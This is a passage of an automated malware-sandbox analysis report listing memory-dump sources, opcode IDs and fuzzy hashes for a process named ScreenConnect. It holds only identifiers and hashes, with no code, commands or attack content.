                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8b1c9a92e33c9c60fde13415253627cf834726bad3685840f65a603fea336c00
                                                                                                                                                  • Instruction ID: 524311d6ebb378fffd104ef41c99b9b6ad5127e83900936ab9249bf8cd865ada
                                                                                                                                                  • Opcode Fuzzy Hash: 8b1c9a92e33c9c60fde13415253627cf834726bad3685840f65a603fea336c00
                                                                                                                                                  • Instruction Fuzzy Hash: EA21AF32A08A8C4FE7D5CF28C8915A17FE1FF95354B2402BBD44DCB252DD2EE9468781
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2572b2a280ad21d02b981c2b522d0e4e28d98308030b1a0b61a3aadf559c8885
                                                                                                                                                  • Instruction ID: bfcef67b7d434c1e0408067ec5c920095acaeaf4246737443242c61e72af260a
                                                                                                                                                  • Opcode Fuzzy Hash: 2572b2a280ad21d02b981c2b522d0e4e28d98308030b1a0b61a3aadf559c8885
                                                                                                                                                  • Instruction Fuzzy Hash: 9921A132B1DD494EEBD5DA1898F06B83E91EF9A308F25006DD54DD31D3CE29EC019741
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8fdd6813fd96cfee642e50f33bd8648c11cf19b54297ce58e4795882350a5012
                                                                                                                                                  • Instruction ID: 0ac26c4d8971e0ee29e4f545dcd489e1d716a14b4072af933e22c473506de8a9
                                                                                                                                                  • Opcode Fuzzy Hash: 8fdd6813fd96cfee642e50f33bd8648c11cf19b54297ce58e4795882350a5012
                                                                                                                                                  • Instruction Fuzzy Hash: 17110A6260D7C90FE796CB3814B51657FE0EF87204F1905FFD089CB1A3C55D98069742
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c8539ccffe1f660664c1f45e7afda0c87fbd4d9f41b6d95b3040cad6113ea3fe
                                                                                                                                                  • Instruction ID: 986f1ebed247b39955e6104f07c925ac9b1391076d43a30b2a43e374cbce8843
                                                                                                                                                  • Opcode Fuzzy Hash: c8539ccffe1f660664c1f45e7afda0c87fbd4d9f41b6d95b3040cad6113ea3fe
                                                                                                                                                  • Instruction Fuzzy Hash: A6113893B1DD8A0BF7A8A52828625B93BC0EF51228B1441AFE19AC71C7EC0DB4074284
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 77d58d1f16af7fc988ead2dfde2469a2596c4b3b8a8cc13a8d65024a1ff77d48
                                                                                                                                                  • Instruction ID: c5fc14ee2ac58f125cb833ee0f6216fdf5b301a981bffd0386931f652f3a5beb
                                                                                                                                                  • Opcode Fuzzy Hash: 77d58d1f16af7fc988ead2dfde2469a2596c4b3b8a8cc13a8d65024a1ff77d48
                                                                                                                                                  • Instruction Fuzzy Hash: AC119431718D084FE7D4EA28D4A8676B7D1FFA9319B24057ED84DC72A5DE2A9C40C741
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 57964f81cdf00ae601821261032855fe81cbf82211fcba273ace7d9fe41e1a8f
                                                                                                                                                  • Instruction ID: 357261964792fd14759682140b6c7994ed981ecb4d15158e5bbb14f6c52ecede
                                                                                                                                                  • Opcode Fuzzy Hash: 57964f81cdf00ae601821261032855fe81cbf82211fcba273ace7d9fe41e1a8f
                                                                                                                                                  • Instruction Fuzzy Hash: 0411A272E0DF889BEFD2DF5858A55A87FA0EF56308F15009AD158D3293EB28A400C742
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 703af05b37e2ef3c56aa1b7a9fd84fdf0539b2f346363e41e8e0d2405bacf7d7
                                                                                                                                                  • Instruction ID: d85636fa33793f532e19fe5e9ab1e45ec1a73e1f6a026c19499d7a430f61147c
                                                                                                                                                  • Opcode Fuzzy Hash: 703af05b37e2ef3c56aa1b7a9fd84fdf0539b2f346363e41e8e0d2405bacf7d7
                                                                                                                                                  • Instruction Fuzzy Hash: A7312B74B062068FE788EB64C8B17ED7AA1FB56314F20417EC24ED72C2DE3C19519B92
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 50efc061069cdd40ed910d59ff43acc59720ea489af3798d6c9bc896729b973e
                                                                                                                                                  • Instruction ID: a3469a9d35135ac616d664284cfd538ee5b043e879bd7e8c7a87ca0ea9d55b20
                                                                                                                                                  • Opcode Fuzzy Hash: 50efc061069cdd40ed910d59ff43acc59720ea489af3798d6c9bc896729b973e
                                                                                                                                                  • Instruction Fuzzy Hash: 03016672B1CB440BDB4C9A08A8521F87BD1EF85724B0004AFF18AD3286DD66A80286C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9f245e823b3a36bfd747bd25843dd1933bb60a85170770855f57d5a7d1892e32
                                                                                                                                                  • Instruction ID: 04e99cd3e31ce12f38b403915184728ac0a9bd70c9ea67564adf78e65e8f5bbc
                                                                                                                                                  • Opcode Fuzzy Hash: 9f245e823b3a36bfd747bd25843dd1933bb60a85170770855f57d5a7d1892e32
                                                                                                                                                  • Instruction Fuzzy Hash: CE01927260E7C80FD796972808741657FE0EF47215F1905EFE0C9DB6A3C55D88059752
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 45513b7e9637401235a15ac6261ddd7a46c9884cd07e481f28967592ce862e75
                                                                                                                                                  • Instruction ID: ad3aa77ec0c4154b0e2e4cf7c968b605d596200f4eddc712f06e444f14748d2a
                                                                                                                                                  • Opcode Fuzzy Hash: 45513b7e9637401235a15ac6261ddd7a46c9884cd07e481f28967592ce862e75
                                                                                                                                                  • Instruction Fuzzy Hash: A1110224F0DA870AFBA9932944F13746EE1EF86344F2981BAC549CA1D6FC1DAC81A301
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bd2db0745186e61150f2ebed376c4ac70793b73ba9aaeb9232d5a4785651f9d5
                                                                                                                                                  • Instruction ID: 206472568f0221c4cc5c89670143e85dcad62a8e9f683aa63c5007efe1e460d4
                                                                                                                                                  • Opcode Fuzzy Hash: bd2db0745186e61150f2ebed376c4ac70793b73ba9aaeb9232d5a4785651f9d5
                                                                                                                                                  • Instruction Fuzzy Hash: 5811A471A158199FDBE4EB58C899A98B7F1FF28300F4441E9E44DE7262DE38ED818F00
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fd043d3840b9e1195d4d503d53a511e3a164e2010decce1ae435dd40ee9cfc2f
                                                                                                                                                  • Instruction ID: 732989267abd1f4cb2e5f9bbfd65aec82e1e54b8abc172cf5dc972e35e66ba6a
                                                                                                                                                  • Opcode Fuzzy Hash: fd043d3840b9e1195d4d503d53a511e3a164e2010decce1ae435dd40ee9cfc2f
                                                                                                                                                  • Instruction Fuzzy Hash: C601AD3060CB028BD79DEB28E0915B9B7D1FF86314F60087CE149C26C6CE3AE446CB01
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9fcf9dd71509ba297f8af4328e21dee94c2dcccf576b03fca0a22f37bd929056
                                                                                                                                                  • Instruction ID: 32f1fa2f5d3e27f7896145cf576b3e92ccf1c36a61bb8f16596819c5a87ac9d7
                                                                                                                                                  • Opcode Fuzzy Hash: 9fcf9dd71509ba297f8af4328e21dee94c2dcccf576b03fca0a22f37bd929056
                                                                                                                                                  • Instruction Fuzzy Hash: 45017D3660D7499FCB52EB2CE8B18D97BA0FF5332D70400BBC288CA012DA255849C781
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 67bbd0f6db2b64bc407acaa15dc06b8203d399b70ecb5b0c0b8cebcb13275f6d
                                                                                                                                                  • Instruction ID: 3415ed43e933ffeb722c87fc6fc2a8e30c3b90aef8eb546f8a4fc6c6745ddc7c
                                                                                                                                                  • Opcode Fuzzy Hash: 67bbd0f6db2b64bc407acaa15dc06b8203d399b70ecb5b0c0b8cebcb13275f6d
                                                                                                                                                  • Instruction Fuzzy Hash: 2001FF70B1A5078AFEE9AF1540F46B96AC1EF57309FE40478DE4ECA1C7CD1CE809A650
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 728893fbe2e8e583aa12b0016edbd9de231179b3f5fb64fb833704f04b4b5287
                                                                                                                                                  • Instruction ID: f50d6cfb6ff40da6ee13cf91653a81e0f975a1d14927efee026b175b1c826607
                                                                                                                                                  • Opcode Fuzzy Hash: 728893fbe2e8e583aa12b0016edbd9de231179b3f5fb64fb833704f04b4b5287
                                                                                                                                                  • Instruction Fuzzy Hash: 17010C71B199068FEBD8DE18C0A07B47B91FF55308F6441A8C54EDB287CE29F8469741
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1b3b88fdc1ba567755a572a84efc0daad954d9c2163b39625c8265002130c6e1
                                                                                                                                                  • Instruction ID: 6c894ec15fa7a894e097f9157337a2335ef121950d5724f8cfa08c02edf30b63
                                                                                                                                                  • Opcode Fuzzy Hash: 1b3b88fdc1ba567755a572a84efc0daad954d9c2163b39625c8265002130c6e1
                                                                                                                                                  • Instruction Fuzzy Hash: 0AF0A42140D3D20FD39297B088A5AD17FF0EF47110B0E42FAD484CB4A3D50C588A9362
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 41430ff3557c33e1d7e24b191a86f003830340a08169966e58e3c2048b36b411
                                                                                                                                                  • Instruction ID: c3e609d000ec9ddd41fda19ebfa1f2a02b192fad40753cb38960d8f8cf4d1c1b
                                                                                                                                                  • Opcode Fuzzy Hash: 41430ff3557c33e1d7e24b191a86f003830340a08169966e58e3c2048b36b411
                                                                                                                                                  • Instruction Fuzzy Hash: 4F011A71B199068FEBD8DF18C0A0BB47BA1FF59308F5441A8C44EDB287CE39E8469741
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f1d51579fa5075b328945caceb372acc2e73448e5051df614781c39e228c3a6f
                                                                                                                                                  • Instruction ID: a7d92538463c0df9fc68c00b57123b1251a25bbf8a9488ae7b3313e4869c7002
                                                                                                                                                  • Opcode Fuzzy Hash: f1d51579fa5075b328945caceb372acc2e73448e5051df614781c39e228c3a6f
                                                                                                                                                  • Instruction Fuzzy Hash: BFE09BB114D50C6EA61CAA55AC479F7779CE747134F40111FE18EC5002F156B5238295
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e28fc557579da3aad66a1dbac78b91b39366584d038307ae3d9cdad4a5cd3f63
                                                                                                                                                  • Instruction ID: b20a1a4853cf386440f1e87751899497f40d248e2d4f26e944078309d6b9d441
                                                                                                                                                  • Opcode Fuzzy Hash: e28fc557579da3aad66a1dbac78b91b39366584d038307ae3d9cdad4a5cd3f63
                                                                                                                                                  • Instruction Fuzzy Hash: FCF08232A54A4D8FD3156B7484651FD7BF9EF45105B6001BAE40DC3196DE2C9915C742
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c1af57a9a7a22e0c32d0ba618aa4ca5fe90ce139f7a4532c33c07cf4b4ef0998
                                                                                                                                                  • Instruction ID: 0e0b1de25c0a29216688bb9669abb28df0707919ccb5d194733ab8843888f98d
                                                                                                                                                  • Opcode Fuzzy Hash: c1af57a9a7a22e0c32d0ba618aa4ca5fe90ce139f7a4532c33c07cf4b4ef0998
                                                                                                                                                  • Instruction Fuzzy Hash: 2BF0EC86F1D89B0BD6E5516C2CE51786AC1DFE561477804BBE11CC328BFC4C6C431281
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fb5e12764e7ede83500b0c5dd30802837fee7560d2d99139234d21df99add80f
                                                                                                                                                  • Instruction ID: 4da211959e5e412d5f0aaa34caea2f5c467a0870c4276d1d4bc1a60e1792ffff
                                                                                                                                                  • Opcode Fuzzy Hash: fb5e12764e7ede83500b0c5dd30802837fee7560d2d99139234d21df99add80f
                                                                                                                                                  • Instruction Fuzzy Hash: 55F0653540C68C5FDF56EB64D4918D67FB0FE1B324B0501C7E149CB053D7659A59CB82
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f2d5550363c97794779e9e0c27baaf7f9c5a051abf210e916a871c2ecec8e0c8
                                                                                                                                                  • Instruction ID: a02fc33b8e1eec9db4825282fb0e303202d592f0ed962ea0df6043b15666a581
                                                                                                                                                  • Opcode Fuzzy Hash: f2d5550363c97794779e9e0c27baaf7f9c5a051abf210e916a871c2ecec8e0c8
                                                                                                                                                  • Instruction Fuzzy Hash: 8DF0FE31E0452E8EDBE4DB2898A97F9B7B1FF95305FA001B9C11DD3281CE396D819B40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0c05428cab9c309db450bafd0ac65db065430d3db648e8e3fdd2b71095ed85b9
                                                                                                                                                  • Instruction ID: b2096317eb7a889254ef4348825ba302e3a5b025314a22a919250942bf16091a
                                                                                                                                                  • Opcode Fuzzy Hash: 0c05428cab9c309db450bafd0ac65db065430d3db648e8e3fdd2b71095ed85b9
                                                                                                                                                  • Instruction Fuzzy Hash: 30E0D86110F3C51FDB67973488A98E53FA0ED1722030A00EFD581CF4B3E5198989D752
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 86429da157c8a03c16692351af24185f4ca2b53ccee7ea5a7f853bf47b7265e8
                                                                                                                                                  • Instruction ID: 72b5e04099e8cc9f4f20362cd3761a420ca18d60084e02199c3b2ee6a999b9c7
                                                                                                                                                  • Opcode Fuzzy Hash: 86429da157c8a03c16692351af24185f4ca2b53ccee7ea5a7f853bf47b7265e8
                                                                                                                                                  • Instruction Fuzzy Hash: FBE0C225B4DA0742FFBCA27578F23B5A4D0CF86315F1980BA951DC44C9FC5C9CC1A292
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e988429d01bf1801649ed72ab25f4e209665fe51d7f3d426b50e1e523c44c93a
                                                                                                                                                  • Instruction ID: 8cd809aba2d2ce9797d67ff6f77048bb977d2f88204de0984ae0df3692d0151a
                                                                                                                                                  • Opcode Fuzzy Hash: e988429d01bf1801649ed72ab25f4e209665fe51d7f3d426b50e1e523c44c93a
                                                                                                                                                  • Instruction Fuzzy Hash: 3DE0E531A1492D8EDBA8EB6898A92ECB3B1EB85315F5001F6C20CD2291CE3469818B40
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7608f1728c81b780ad7e4e1060e676701baa48c7ffc10bff3685514d3e6248c8
                                                                                                                                                  • Instruction ID: c56a32d738ef71da7a1dd9e5c4e5b824f6d0bf9dbf115f41ec51ba9b96b8a540
                                                                                                                                                  • Opcode Fuzzy Hash: 7608f1728c81b780ad7e4e1060e676701baa48c7ffc10bff3685514d3e6248c8
                                                                                                                                                  • Instruction Fuzzy Hash: 8ED05E52B1D81A0AA6D4925C24E21B846C1E7896E476400B7E52EC728AEC0CAC8312C0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e76901cbb2739ac76146a3324f6c2f591e5622cc61c2203a93b769ae80643bc1
                                                                                                                                                  • Instruction ID: f0278c410490ffc621aec861f16afc768032d6eae2213ba0c68a3a0ae16440a5
                                                                                                                                                  • Opcode Fuzzy Hash: e76901cbb2739ac76146a3324f6c2f591e5622cc61c2203a93b769ae80643bc1
                                                                                                                                                  • Instruction Fuzzy Hash: 89D01243B59C1F0FA5D4915C38AAAF452C2D7E86657681477EE1CC334AED1CAC8327C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: aba9f37f8cacc12d43ae6da9d0dfd377f654e95c5ce606cc12183901310604e4
                                                                                                                                                  • Instruction ID: c35ee9d9aa926391e9f2294e22e41bd8df3ccdaee937674fce71968df4c8ce9a
                                                                                                                                                  • Opcode Fuzzy Hash: aba9f37f8cacc12d43ae6da9d0dfd377f654e95c5ce606cc12183901310604e4
                                                                                                                                                  • Instruction Fuzzy Hash: F5D06C3571495D8F8B80EF4CE880AEA77A0FF99312B8108A1E61DC7225CA75E8258B80
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 62d934b06c8ce9960935b647ed001407a413cebd12b6cb8f2689c92c773dd801
                                                                                                                                                  • Instruction ID: ba38702d797d573ccb0d5b7611ffd86f2655ef76d6ea044e75b94fed701c8a04
                                                                                                                                                  • Opcode Fuzzy Hash: 62d934b06c8ce9960935b647ed001407a413cebd12b6cb8f2689c92c773dd801
                                                                                                                                                  • Instruction Fuzzy Hash: BCC09B50F1854786F294EB244CE117D36526F89645BD0C935D10DC1186CD7C75017585
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.2440963652.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ffd34a80000_ScreenConnect.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 645fb81455c185ba2da7f8d5d77bf8172e4d73ee1857f73a79be1eefd4a90f9f
